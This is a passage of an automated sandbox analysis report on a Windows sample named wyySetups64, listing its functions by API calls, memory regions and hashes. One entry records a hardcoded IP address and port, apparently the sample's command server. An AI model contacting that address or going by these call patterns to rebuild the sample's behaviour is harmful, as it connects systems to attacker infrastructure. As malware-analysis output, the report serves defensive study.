                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2605973128-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __floor_pentium4.LIBCMT ref: 00BD112F
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00BD115F
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BD1192
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
• Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2605973128-0
                                                                                                                                                                                                              • Opcode ID: 79ee2336c6828d91deda865a94637bcf5566ef17ad546e919a47159159bfe56a
                                                                                                                                                                                                              • Instruction ID: abb626a9eb8073e2d67310bf245daa847c2d2b275417ce4af5a452705529974e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79ee2336c6828d91deda865a94637bcf5566ef17ad546e919a47159159bfe56a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51118470A40705AFDB109FADDC86B6EFBF4EF04705F0084AAEA59E7240EA709910C754
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __floor_pentium4.LIBCMT ref: 0337112F
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0337115F
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03371192
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2605973128-0
                                                                                                                                                                                                              • Opcode ID: 74bb3291d6698b6050cf8a8d5e1739fc6eaaaac1e0c9ae51adb581d808654194
                                                                                                                                                                                                              • Instruction ID: 95bc239c93b7df083623349a9703ec178ec0bd39db148e232d3501e28c9a0a1c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74bb3291d6698b6050cf8a8d5e1739fc6eaaaac1e0c9ae51adb581d808654194
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E11D371E00708AFEB20DFA9DCC6B6EFBF8FF04705F0084A9E959E6640E635A8108710
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03379E04
                                                                                                                                                                                                              • GdipDisposeImage.GDIPLUS(?), ref: 03379E18
                                                                                                                                                                                                              • GdipDisposeImage.GDIPLUS(?), ref: 03379E3B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 800915452-0
                                                                                                                                                                                                              • Opcode ID: df5748b14223d6f53a481fdde022479a82e4d1bf7b16493d324c94b91e31bbd3
                                                                                                                                                                                                              • Instruction ID: e0510abdbc46d7e2da3bbf6b0c3fd7d28461e5d3976ee7fdd0033f2daf3db09b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: df5748b14223d6f53a481fdde022479a82e4d1bf7b16493d324c94b91e31bbd3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30F08175D1021DE78B20EF98D8848AFF7B8AB49711B00465AEC05AB340D7354A05CBD0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0339FB64), ref: 03379ADC
                                                                                                                                                                                                              • GdiplusStartup.GDIPLUS(0339FB60,?,?), ref: 03379B15
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0339FB64), ref: 03379B26
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 389129658-0
                                                                                                                                                                                                              • Opcode ID: 2265cd89a7d926c780034d27c39e3d8fb2a3a92d7506f39ada9627221e4cc878
                                                                                                                                                                                                              • Instruction ID: fc6f73069775432ef44f68760bb497aecc3753d8c2e6a576f981ac31db8ac6be
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2265cd89a7d926c780034d27c39e3d8fb2a3a92d7506f39ada9627221e4cc878
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1F0497194120DEFEF10EFA1E8EA7AAB7ACE704316F50029AD90496245D7B60148CAA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                              • String ID: 118.107.44.219$19091
                                                                                                                                                                                                              • API String ID: 3472027048-838246116
                                                                                                                                                                                                              • Opcode ID: 7b9da5158bea4e3c36ffa86015f0e3b49a8de531e6412074f48f5d3ac501d09f
                                                                                                                                                                                                              • Instruction ID: 5e3cc0f1b6bdf1f5622f7fdad1222982a95450157dfb7c9536ee1e515acafb2a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b9da5158bea4e3c36ffa86015f0e3b49a8de531e6412074f48f5d3ac501d09f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4D022B06645A28B8A1496019CE5C37F3F4FA8031532401DAF887873E0FBB06C08AAA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd_noexit.LIBCMT ref: 00BD715B
                                                                                                                                                                                                                • Part of subcall function 00BD9896: GetLastError.KERNEL32(00000001,00000000,00BD7112,00BD6F0C,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F), ref: 00BD989A
                                                                                                                                                                                                                • Part of subcall function 00BD9896: ___set_flsgetvalue.LIBCMT ref: 00BD98A8
                                                                                                                                                                                                                • Part of subcall function 00BD9896: __calloc_crt.LIBCMT ref: 00BD98BC
                                                                                                                                                                                                                • Part of subcall function 00BD9896: DecodePointer.KERNEL32(00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000,00000000,?,00BD99BA), ref: 00BD98D6
                                                                                                                                                                                                                • Part of subcall function 00BD9896: GetCurrentThreadId.KERNEL32 ref: 00BD98EC
                                                                                                                                                                                                                • Part of subcall function 00BD9896: SetLastError.KERNEL32(00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000,00000000,?,00BD99BA), ref: 00BD9904
                                                                                                                                                                                                              • __freeptd.LIBCMT ref: 00BD7165
                                                                                                                                                                                                                • Part of subcall function 00BD9A58: TlsGetValue.KERNEL32(?,?,00BD7711,00000000,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9A79
                                                                                                                                                                                                                • Part of subcall function 00BD9A58: TlsGetValue.KERNEL32(?,?,00BD7711,00000000,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9A8B
                                                                                                                                                                                                                • Part of subcall function 00BD9A58: DecodePointer.KERNEL32(00000000,?,00BD7711,00000000,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9AA1
                                                                                                                                                                                                                • Part of subcall function 00BD9A58: __freefls@4.LIBCMT ref: 00BD9AAC
                                                                                                                                                                                                                • Part of subcall function 00BD9A58: TlsSetValue.KERNEL32(00000025,00000000,?,00BD7711,00000000,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9ABE
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00BD716E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4224061863-0
                                                                                                                                                                                                              • Opcode ID: f38e2fd3af5b98b51f4f49d36d2024edab8653c526fddae62a6e03404f1837e6
                                                                                                                                                                                                              • Instruction ID: 4b61ba8e797e92850a852b5a54a959255a432c6f95f71706ec06e38afc466901
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f38e2fd3af5b98b51f4f49d36d2024edab8653c526fddae62a6e03404f1837e6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FC02B3100064C3BCB203732CC0E94FBECDCD80340B900052F9089A311FE30DC009551
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 031F022B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Time_memmovetime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1463837790-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Time_memmovetime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1463837790-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00BD3023
                                                                                                                                                                                                              • recv.WS2_32(?,?,00040000,00000000), ref: 00BD3044
                                                                                                                                                                                                                • Part of subcall function 00BD710D: __getptd_noexit.LIBCMT ref: 00BD710D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd_noexitrecvselect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4248608111-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 03373043
                                                                                                                                                                                                              • recv.WS2_32(?,?,00040000,00000000), ref: 03373064
                                                                                                                                                                                                                • Part of subcall function 0337F91B: __getptd_noexit.LIBCMT ref: 0337F91B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd_noexitrecvselect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4248608111-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • send.WS2_32(?,?,00040000,00000000), ref: 03373291
                                                                                                                                                                                                              • send.WS2_32(?,?,?,00000000), ref: 033732CE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: send
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2809346765-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: SleepTimetime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 346578373-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: SleepTimetime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 346578373-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,00BD5AF2), ref: 00BD642B
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD6466
                                                                                                                                                                                                                • Part of subcall function 00BD1280: __CxxThrowException@8.LIBCMT ref: 00BD1290
                                                                                                                                                                                                                • Part of subcall function 00BD1280: DeleteCriticalSection.KERNEL32(00000000,?,00BE7E78), ref: 00BD12A1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1116298128-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000004,00000000,00000000,0337E04E,00000000,03379800,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 0337CD1B
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337CD56
                                                                                                                                                                                                                • Part of subcall function 03371280: __CxxThrowException@8.LIBCMT ref: 03371290
                                                                                                                                                                                                                • Part of subcall function 03371280: DeleteCriticalSection.KERNEL32(00000000,0337D3E6,03396624,?,?,0337D3E6,?,?,?,?,03395A40,00000000), ref: 033712A1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1116298128-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0337DF10,00000000,00000000,00000000), ref: 0337E49B
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03381168,?,?,?,?,?,?,03396298,0000000C,03381210,?), ref: 0337E4A9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateObjectSingleThreadWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1891408510-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BD7181
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __getptd_noexit.LIBCMT ref: 00BD9912
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __amsg_exit.LIBCMT ref: 00BD991F
                                                                                                                                                                                                                • Part of subcall function 00BD7156: __getptd_noexit.LIBCMT ref: 00BD715B
                                                                                                                                                                                                                • Part of subcall function 00BD7156: __freeptd.LIBCMT ref: 00BD7165
                                                                                                                                                                                                                • Part of subcall function 00BD7156: ExitThread.KERNEL32 ref: 00BD716E
                                                                                                                                                                                                              • __XcptFilter.LIBCMT ref: 00BD71A2
                                                                                                                                                                                                                • Part of subcall function 00BD9C41: __getptd_noexit.LIBCMT ref: 00BD9C47
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 418257734-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0337F98F
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __getptd_noexit.LIBCMT ref: 03383E5E
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __amsg_exit.LIBCMT ref: 03383E6B
                                                                                                                                                                                                                • Part of subcall function 0337F964: __getptd_noexit.LIBCMT ref: 0337F969
                                                                                                                                                                                                                • Part of subcall function 0337F964: __freeptd.LIBCMT ref: 0337F973
                                                                                                                                                                                                                • Part of subcall function 0337F964: ExitThread.KERNEL32 ref: 0337F97C
                                                                                                                                                                                                              • __XcptFilter.LIBCMT ref: 0337F9B0
                                                                                                                                                                                                                • Part of subcall function 0338418F: __getptd_noexit.LIBCMT ref: 03384195
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 418257734-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __lock.LIBCMT ref: 0338641B
                                                                                                                                                                                                                • Part of subcall function 03388E5B: __mtinitlocknum.LIBCMT ref: 03388E71
                                                                                                                                                                                                                • Part of subcall function 03388E5B: __amsg_exit.LIBCMT ref: 03388E7D
                                                                                                                                                                                                                • Part of subcall function 03388E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03383F06,0000000D,03396340,00000008,03383FFF,00000000,?,033810F0,00000000,03396278,00000008,03381155,?), ref: 03388E85
                                                                                                                                                                                                              • __tzset_nolock.LIBCMT ref: 0338642C
                                                                                                                                                                                                                • Part of subcall function 03385D22: __lock.LIBCMT ref: 03385D44
                                                                                                                                                                                                                • Part of subcall function 03385D22: ____lc_codepage_func.LIBCMT ref: 03385D8B
                                                                                                                                                                                                                • Part of subcall function 03385D22: __getenv_helper_nolock.LIBCMT ref: 03385DAD
                                                                                                                                                                                                                • Part of subcall function 03385D22: _free.LIBCMT ref: 03385DE4
                                                                                                                                                                                                                • Part of subcall function 03385D22: _strlen.LIBCMT ref: 03385DEB
                                                                                                                                                                                                                • Part of subcall function 03385D22: __malloc_crt.LIBCMT ref: 03385DF2
                                                                                                                                                                                                                • Part of subcall function 03385D22: _strlen.LIBCMT ref: 03385E08
                                                                                                                                                                                                                • Part of subcall function 03385D22: _strcpy_s.LIBCMT ref: 03385E16
                                                                                                                                                                                                                • Part of subcall function 03385D22: __invoke_watson.LIBCMT ref: 03385E2B
                                                                                                                                                                                                                • Part of subcall function 03385D22: _free.LIBCMT ref: 03385E3A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
